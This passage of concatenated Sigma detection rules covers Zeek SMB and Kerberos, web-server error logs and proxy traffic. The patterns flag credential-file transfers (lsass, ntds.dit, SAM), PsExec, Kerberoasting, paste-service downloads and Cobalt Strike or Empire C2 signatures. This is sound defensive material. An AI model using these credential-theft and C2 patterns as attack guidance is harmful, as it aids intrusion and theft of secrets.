Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml' references: - https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html author: 'Samir Bousseaden, @neu5ron' date: 2020-03-19 modified: 2021-11-27 tags: - attack.credential-access - attack.t1003.002 - attack.t1003.004 - attack.t1003.003 logsource: product: zeek service: smb_files detection: selection: path|contains|all: - '\' - 'ADMIN$' name|contains: 'SYSTEM32\' name|endswith: '.tmp' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml ================================================ title: First Time Seen Remote Named Pipe - Zeek id: 021310d9-30a6-480a-84b7-eaa69aeb92bb related: - id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad type: derived status: test description: This detection excludes known named pipes accessible remotely and notifies on newly observed ones. This may help to detect lateral movement and remote execution using named pipes references: - https://twitter.com/menasec1/status/1104489274387451904 author: Samir Bousseaden, @neu5ron, Tim Shelton date: 2020-04-02 modified: 2022-12-27 tags: - attack.lateral-movement - attack.t1021.002 logsource: product: zeek service: smb_files detection: selection: path: '\\\\\*\\IPC$' # Looking for the string \\*\IPC$ filter_keywords: - 'samr' - 'lsarpc' - 'winreg' - 'netlogon' - 'srvsvc' - 'protected_storage' - 'wkssvc' - 'browser' - 'netdfs' - 'svcctl' - 'spoolss' - 'ntsvcs' - 'LSM_API_service' - 'HydraLsPipe' - 'TermSrv_API_service' - 'MsFteWds' condition: selection and not 1 of filter_* falsepositives: - Update the excluded named pipe list to filter out any newly observed legitimate named pipe level: high ================================================ FILE: rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml ================================================ title: Suspicious PsExec 
Execution - Zeek id: f1b3a22a-45e6-4004-afb5-4291f9c21166 related: - id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 type: derived status: test description: Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a PsExec client other than the Sysinternals one references: - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html author: Samir Bousseaden, @neu5ron, Tim Shelton date: 2020-04-02 modified: 2022-12-27 tags: - attack.lateral-movement - attack.t1021.002 logsource: product: zeek service: smb_files detection: selection: path|contains|all: - '\\' - '\IPC$' name|endswith: - '-stdin' - '-stdout' - '-stderr' filter: name|startswith: 'PSEXESVC' condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml ================================================ title: Suspicious Access to Sensitive File Extensions - Zeek id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc related: - id: 91c945bc-2ad1-4799-a591-4d00198a1215 type: derived status: test description: Detects known sensitive file extensions via Zeek references: - Internal Research author: Samir Bousseaden, @neu5ron date: 2020-04-02 modified: 2025-10-17 tags: - attack.collection logsource: product: zeek service: smb_files detection: selection: name|endswith: - '.pst' - '.ost' - '.msg' - '.nst' - '.oab' - '.edb' - '.nsf' - '.bak' - '.dmp' - '.kirbi' # - '\groups.xml' # Commented out: groups.xml is accessed legitimately by Group Policy processing; high FP rate in enterprise environments - '.rdp' condition: selection falsepositives: - Help Desk operator doing backup or re-imaging end user machine or backup software - Users working with these data types or exchanging message files level: medium 
================================================ FILE: rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml ================================================ title: Transferring Files with Credential Data via Network Shares - Zeek id: 2e69f167-47b5-4ae7-a390-47764529eff5 related: - id: 910ab938-668b-401b-b08c-b596e80fdca5 type: similar status: test description: Transferring files with well-known filenames (sensitive files with credential data) using network shares references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: '@neu5ron, Teymur Kheirkhabarov, oscd.community' date: 2020-04-02 modified: 2021-11-27 tags: - attack.credential-access - attack.t1003.002 - attack.t1003.001 - attack.t1003.003 logsource: product: zeek service: smb_files detection: selection: name: - '\mimidrv' - '\lsass' - '\windows\minidump\' - '\hiberfil' - '\sqldmpr' - '\sam' - '\ntds.dit' - '\security' condition: selection falsepositives: - Transferring sensitive files for legitimate administration work by legitimate administrator level: medium ================================================ FILE: rules/network/zeek/zeek_susp_kerberos_rc4.yml ================================================ title: Kerberos Network Traffic RC4 Ticket Encryption id: 503fe26e-b5f2-4944-a126-eab405cc06e5 status: test description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting references: - https://adsecurity.org/?p=3458 author: sigma date: 2020-02-12 modified: 2021-11-27 tags: - attack.credential-access - attack.t1558.003 logsource: product: zeek service: kerberos detection: selection: request_type: 'TGS' cipher: 'rc4-hmac' computer_acct: service|startswith: '$' condition: selection and not computer_acct falsepositives: - Normal enterprise SPN requests activity level: medium ================================================ FILE: rules/web/product/apache/web_apache_segfault.yml 
================================================ title: Apache Segmentation Fault id: 1da8ce0b-855d-4004-8860-7d64d42063b1 status: test description: Detects a segmentation fault error message caused by a crashing apache worker process references: - http://www.securityfocus.com/infocus/1633 author: Florian Roth (Nextron Systems) date: 2017-02-28 modified: 2021-11-27 tags: - attack.impact - attack.t1499.004 logsource: service: apache definition: 'Requirements: Must be able to collect the error.log file' detection: keywords: - 'exit signal Segmentation Fault' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/web/product/apache/web_apache_threading_error.yml ================================================ title: Apache Threading Error id: e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c status: test description: Detects an issue in apache logs that reports threading related errors references: - https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md author: Florian Roth (Nextron Systems) date: 2019-01-22 modified: 2021-11-27 tags: - attack.initial-access - attack.lateral-movement - attack.t1190 - attack.t1210 logsource: service: apache definition: 'Requirements: Must be able to collect the error.log file' detection: keywords: - '__pthread_tpp_change_priority: Assertion `new_prio == -1 || (new_prio >= fifo_min_prio && new_prio <= fifo_max_prio)' condition: keywords falsepositives: - 3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185 level: medium ================================================ FILE: rules/web/product/nginx/web_nginx_core_dump.yml ================================================ title: Nginx Core Dump id: 59ec40bb-322e-40ab-808d-84fa690d7e56 status: test description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts. 
references: - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/ author: Florian Roth (Nextron Systems) date: 2021-05-31 modified: 2023-05-08 tags: - attack.impact - attack.t1499.004 logsource: service: nginx detection: keywords: - 'exited on signal 6 (core dumped)' condition: keywords falsepositives: - Serious issues with a configuration or plugin level: high ================================================ FILE: rules/web/proxy_generic/proxy_download_susp_dyndns.yml ================================================ title: Download from Suspicious Dyndns Hosts id: 195c1119-ef07-4909-bb12-e66f5e07bf3c status: test description: Detects download of certain file types from hosts with dynamic DNS names (selected list) references: - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats author: Florian Roth (Nextron Systems) date: 2017-11-08 modified: 2023-05-18 tags: - attack.defense-evasion - attack.command-and-control - attack.t1105 - attack.t1568 logsource: category: proxy detection: selection: c-uri-extension: - 'exe' - 'vbs' - 'bat' - 'rar' - 'ps1' - 'doc' - 'docm' - 'xls' - 'xlsm' - 'pptm' - 'rtf' - 'hta' - 'dll' - 'ws' - 'wsf' - 'sct' - 'zip' # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/ cs-host|endswith: - '.hopto.org' - '.no-ip.org' - '.no-ip.info' - '.no-ip.biz' - '.no-ip.com' - '.noip.com' - '.ddns.name' - '.myftp.org' - '.myftp.biz' - '.serveblog.net' - '.servebeer.com' - '.servemp3.com' - '.serveftp.com' - '.servequake.com' - '.servehalflife.com' - '.servehttp.com' - '.servegame.com' - '.servepics.com' - '.myvnc.com' - '.ignorelist.com' - '.jkub.com' - '.dlinkddns.com' - '.jumpingcrab.com' - '.ddns.info' - '.mooo.com' - '.dns-dns.com' - '.strangled.net' - '.adultdns.net' - '.craftx.biz' - '.ddns01.com' - '.dns53.biz' - 
'.dnsapi.info' - '.dnsd.info' - '.dnsdynamic.com' - '.dnsdynamic.net' - '.dnsget.org' - '.fe100.net' - '.flashserv.net' - '.ftp21.net' - '.http01.com' - '.http80.info' - '.https443.com' - '.imap01.com' - '.kadm5.com' - '.mysq1.net' - '.ns360.info' - '.ntdll.net' - '.ole32.com' - '.proxy8080.com' - '.sql01.com' - '.ssh01.com' - '.ssh22.net' - '.tempors.com' - '.tftpd.net' - '.ttl60.com' - '.ttl60.org' - '.user32.com' - '.voip01.com' - '.wow64.net' - '.x64.me' - '.xns01.com' - '.dyndns.org' - '.dyndns.info' - '.dyndns.tv' - '.dyndns-at-home.com' - '.dnsomatic.com' - '.zapto.org' - '.webhop.net' - '.25u.com' - '.slyip.net' condition: selection falsepositives: - Software downloads level: medium ================================================ FILE: rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml ================================================ title: Download From Suspicious TLD - Blacklist id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19 related: - id: b5de2919-b74a-4805-91a7-5049accbaefe type: similar status: test description: Detects download of certain file types from hosts in suspicious TLDs references: - https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf - https://www.spamhaus.org/statistics/tlds/ - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ author: Florian Roth (Nextron Systems) date: 2017-11-07 modified: 2023-05-18 tags: - attack.initial-access - attack.t1566 - attack.execution - attack.t1203 - attack.t1204.002 logsource: category: proxy detection: selection: c-uri-extension: - 'exe' - 'vbs' - 'bat' - 'rar' - 'ps1' - 'doc' - 'docm' - 'xls' - 'xlsm' - 'pptm' - 'rtf' - 'hta' - 'dll' - 'ws' - 'wsf' - 'sct' - 'zip' # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/ cs-host|endswith: # Symantec / Chris Larsen analysis - '.country' - '.stream' - '.gdn' - '.mom' - '.xin' - 
'.kim' - '.men' - '.loan' - '.download' - '.racing' - '.online' - '.science' - '.ren' - '.gb' - '.win' - '.top' - '.review' - '.vip' - '.party' - '.tech' - '.xyz' - '.date' - '.faith' - '.zip' - '.cricket' - '.space' # McAfee report - '.info' - '.vn' - '.cm' - '.am' - '.cc' - '.asia' - '.ws' - '.tk' - '.biz' - '.su' - '.st' - '.ro' - '.ge' - '.ms' - '.pk' - '.nu' - '.me' - '.ph' - '.to' - '.tt' - '.name' - '.tv' - '.kz' - '.tc' - '.mobi' # Spamhaus - '.study' - '.click' - '.link' - '.trade' - '.accountant' # Spamhaus 2018 https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ - '.cf' - '.gq' - '.ml' - '.ga' # Custom - '.pw' condition: selection falsepositives: - All kinds of software downloads level: low ================================================ FILE: rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml ================================================ title: Download From Suspicious TLD - Whitelist id: b5de2919-b74a-4805-91a7-5049accbaefe related: - id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19 type: similar status: test description: Detects executable downloads from suspicious remote systems references: - Internal Research author: Florian Roth (Nextron Systems) date: 2017-03-13 modified: 2023-05-18 tags: - attack.initial-access - attack.t1566 - attack.execution - attack.t1203 - attack.t1204.002 logsource: category: proxy detection: selection: c-uri-extension: - 'exe' - 'vbs' - 'bat' - 'rar' - 'ps1' - 'doc' - 'docm' - 'xls' - 'xlsm' - 'pptm' - 'rtf' - 'hta' - 'dll' - 'ws' - 'wsf' - 'sct' - 'zip' # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/ filter: cs-host|endswith: - '.com' - '.org' - '.net' - '.edu' - '.gov' - '.uk' - '.ca' - '.de' - '.jp' - '.fr' - '.au' - '.us' - '.ch' - '.it' - '.nl' - '.se' - '.no' - '.es' # Extend this list as needed condition: selection and not filter falsepositives: - All kind of software downloads level: low 
================================================ FILE: rules/web/proxy_generic/proxy_downloadcradle_webdav.yml ================================================ title: Windows WebDAV User Agent id: e09aed7a-09e0-4c9a-90dd-f0d52507347e status: test description: Detects WebDav DownloadCradle references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html author: Florian Roth (Nextron Systems) date: 2018-04-06 modified: 2021-11-27 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/' cs-method: 'GET' condition: selection falsepositives: - Administrative scripts that download files from the Internet - Administrative scripts that retrieve certain website contents - Legitimate WebDAV administration level: high ================================================ FILE: rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml ================================================ title: F5 BIG-IP iControl Rest API Command Execution - Proxy id: b59c98c6-95e8-4d65-93ee-f594dfb96b17 related: - id: 85254a62-22be-4239-b79c-2ec17e566c37 type: similar status: test description: Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP references: - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash - https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029 - https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516 author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo date: 2023-11-08 tags: - attack.initial-access - attack.t1190 logsource: category: proxy detection: selection: cs-method: 'POST' c-uri|endswith: '/mgmt/tm/util/bash' condition: selection falsepositives: - Legitimate usage of the BIG IP REST API to execute command for administration purposes level: medium 
================================================ FILE: rules/web/proxy_generic/proxy_hello_world_user_agent.yml ================================================ title: Potential Hello-World Scraper Botnet Activity id: 1712bafe-be05-4a0e-89d4-17a3ed151bf5 status: experimental description: | Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string. references: - https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan - https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30 author: Joseph A. M. date: 2025-08-02 tags: - attack.reconnaissance - attack.t1595 logsource: category: proxy detection: selection: c-useragent: 'Hello-World/1.0' cs-method: 'GET' condition: selection falsepositives: - Legitimate network monitoring or vulnerability scanning tools that may use this generic user agent. - Internal development or testing scripts. Consider filtering by source IP if this is expected from certain systems. 
level: medium ================================================ FILE: rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml ================================================ title: HackTool - BabyShark Agent Default URL Pattern id: 304810ed-8853-437f-9e36-c4975c3dfd7e status: test description: Detects Baby Shark C2 Framework default communication patterns references: - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845 author: Florian Roth (Nextron Systems) date: 2021-06-09 modified: 2024-02-15 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-uri|contains: 'momyshark\?key=' condition: selection falsepositives: - Unlikely level: critical ================================================ FILE: rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml ================================================ title: HackTool - CobaltStrike Malleable Profile Patterns - Proxy id: f3f21ce1-cdef-4bfc-8328-ed2e826f5fac related: - id: 953b895e-5cc9-454b-b183-7f3db555452e type: obsolete - id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8 type: obsolete - id: 37325383-740a-403d-b1a2-b2b4ab7992e7 type: obsolete - id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc type: obsolete status: test description: Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods). 
references: - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100 - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/ - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile author: Markus Neis, Florian Roth (Nextron Systems) date: 2024-02-15 tags: - attack.defense-evasion - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection_amazon_1: c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' cs-method: 'GET' c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' cs-host: 'www.amazon.com' cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996' selection_amazon_2: c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' cs-method: 'POST' c-uri: '/N4215/adj/amzn.us.sr.aps' cs-host: 'www.amazon.com' selection_generic_1: c-useragent: - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)' - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )' - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08' selection_generic_2: c-useragent|endswith: '; MANM; MANM)' selection_oscp: c-uri|contains: '/oscp/' cs-host: 'ocsp.verisign.com' selection_onedrive: cs-method: 'GET' c-uri|endswith: '\?manifest=wac' cs-host: 'onedrive.live.com' filter_main_onedrive: c-uri|startswith: 'http' c-uri|contains: '://onedrive.live.com/' condition: 1 of selection_* and not 1 of filter_main_* falsepositives: - Unknown level: high ================================================ FILE: 
rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml ================================================ title: HackTool - Empire UserAgent URI Combo id: b923f7d6-ac89-4a50-a71a-89fb846b4aa8 status: test description: Detects user agent and URI paths used by empire agents references: - https://github.com/BC-SECURITY/Empire author: Florian Roth (Nextron Systems) date: 2020-07-13 modified: 2024-02-26 tags: - attack.defense-evasion - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' cs-uri: - '/admin/get.php' - '/news.php' - '/login/process.php' cs-method: 'POST' condition: selection falsepositives: - Valid requests with this exact user agent to server scripts of the defined names level: high ================================================ FILE: rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml ================================================ title: PUA - Advanced IP/Port Scanner Update Check id: 1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d status: test description: Detects the update check performed by Advanced IP/Port Scanner utilities. references: - https://www.advanced-ip-scanner.com/ - https://www.advanced-port-scanner.com/ author: Axel Olsson date: 2022-08-14 modified: 2024-02-15 tags: - attack.discovery - attack.reconnaissance - attack.t1590 logsource: category: proxy detection: selection: # Example request: http://www.advanced-port-scanner.com/checkupdate.php?lng=en&ver=2-5-3680&beta=n&type=upd&rmode=p&product=aps # Example request2: http://www.advanced-ip-scanner.com/checkupdate.php?lng=en&ver=2-5-3499&beta=n&type=upd&rmode=p&product=aips c-uri|contains: '/checkupdate.php' c-uri-query|contains|all: - 'lng=' - 'ver=' - 'beta=' - 'type=' - 'rmode=' - 'product=' condition: selection falsepositives: - Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environment. 
level: medium ================================================ FILE: rules/web/proxy_generic/proxy_pwndrop.yml ================================================ title: PwnDrp Access id: 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e status: test description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity references: - https://breakdev.org/pwndrop/ author: Florian Roth (Nextron Systems) date: 2020-04-15 modified: 2021-11-27 tags: - attack.command-and-control - attack.t1071.001 - attack.t1102.001 - attack.t1102.003 logsource: category: proxy detection: selection: c-uri|contains: '/pwndrop/' condition: selection falsepositives: - Unknown level: critical ================================================ FILE: rules/web/proxy_generic/proxy_raw_paste_service_access.yml ================================================ title: Raw Paste Service Access id: 5468045b-4fcc-4d1a-973c-c9c9578edacb status: test description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form references: - https://www.virustotal.com/gui/domain/paste.ee/relations author: Florian Roth (Nextron Systems) date: 2019-12-05 modified: 2023-01-19 tags: - attack.command-and-control - attack.t1071.001 - attack.t1102.001 - attack.t1102.003 - attack.defense-evasion logsource: category: proxy detection: selection: c-uri|contains: - '.paste.ee/r/' - '.pastebin.com/raw/' - '.hastebin.com/raw/' - '.ghostbin.co/paste/*/raw/' - 'pastetext.net/' - 'pastebin.pl/' - 'paste.ee/' condition: selection falsepositives: - User activity (e.g. 
developer that shared and copied code snippets and used the raw link instead of just copy & paste) level: high ================================================ FILE: rules/web/proxy_generic/proxy_susp_flash_download_loc.yml ================================================ title: Flash Player Update from Suspicious Location id: 4922a5dd-6743-4fc2-8e81-144374280997 status: test description: Detects a flashplayer update from an unofficial location references: - https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb author: Florian Roth (Nextron Systems) date: 2017-10-25 modified: 2022-08-08 tags: - attack.initial-access - attack.t1189 - attack.execution - attack.t1204.002 - attack.defense-evasion - attack.t1036.005 logsource: category: proxy detection: selection: - c-uri|contains: '/flash_install.php' - c-uri|endswith: '/install_flash_player.exe' filter: cs-host|endswith: '.adobe.com' condition: selection and not filter falsepositives: - Unknown flash download locations level: high ================================================ FILE: rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml ================================================ title: Suspicious Network Communication With IPFS id: eb6c2004-1cef-427f-8885-9042974e5eb6 status: test description: Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages. 
references: - https://blog.talosintelligence.com/ipfs-abuse/ - https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11 - https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638 author: Gavin Knapp date: 2023-03-16 tags: - attack.collection - attack.credential-access - attack.t1056 logsource: category: proxy detection: selection: cs-uri|re: '(?i)(ipfs\.io/|ipfs\.io\s).+\..+@.+\.[a-z]+' condition: selection falsepositives: - Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this. level: low ================================================ FILE: rules/web/proxy_generic/proxy_telegram_api.yml ================================================ title: Telegram API Access id: b494b165-6634-483d-8c47-2026a6c52372 status: test description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent references: - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/ - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ author: Florian Roth (Nextron Systems) date: 2018-06-05 modified: 2023-05-18 tags: - attack.defense-evasion - attack.command-and-control - attack.t1071.001 - attack.t1102.002 logsource: category: proxy detection: selection: cs-host: 'api.telegram.org' # Often used by Bots filter: c-useragent|contains: # Used https://core.telegram.org/bots/samples for this list - 'Telegram' - 'Bot' condition: selection and not filter falsepositives: - Legitimate use of Telegram bots in the company level: medium ================================================ FILE: rules/web/proxy_generic/proxy_ua_apt.yml 
================================================ title: APT User Agent id: 6ec820f2-e963-4801-9127-d8b2dce4d31b status: test description: Detects suspicious user agent strings used in APT malware in proxy logs references: - Internal Research author: Florian Roth (Nextron Systems), Markus Neis date: 2019-11-12 modified: 2024-02-15 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent: # APT Related - 'SJZJ (compatible; MSIE 6.0; Win32)' # APT Backspace - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0' # APT GrizzlySteppe - ChopStick - US CERT https://www.cisa.gov/news-events/alerts/2017/02/10/enhanced-analysis-grizzly-steppe - 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC' # Comment Crew Miniasp - 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)' # Comment Crew Miniasp - 'webclient' # Naikon APT - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200' # Naikon APT - 'Mozilla/4.0 (compatible; MSI 6.0;' # SnowGlobe Babar - yes, it is cut - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # Sofacy - Xtunnel - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/' # Sofacy - Xtunnel - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2' # Sofacy - Xtunnel - 'Mozilla/4.0' # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021 - 'Netscape' # Unit78020 Malware - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7' # Unit78020 Malware - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1' # Winnti related - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)' # Winnti related - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)' # APT17 - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)' # Bronze Butler - 
Daserf - 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)' # Bronze Butler - Daserf - 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)' # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597 - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ - 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)' # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ - 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ - 'Mozilla v5.1 *' # Sofacy Zebrocy samples - 'MSIE 8.0' # Sofacy Azzy Backdoor from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100 - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html - 'Mozilla/4.0 (compatible; RMS)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/ - 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/ - 'O/9.27 (W; U; Z)' # Cmstar 
https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0*' # KerrDown UA - 'Mozilla/5.0 (Windows NT 9; *' # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018 - 'hots scot' # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20 - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)' # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/ - 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36' # Hidden Cobra malware - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657 - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/ - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0' # LitePower stager used by WRITE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/ - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 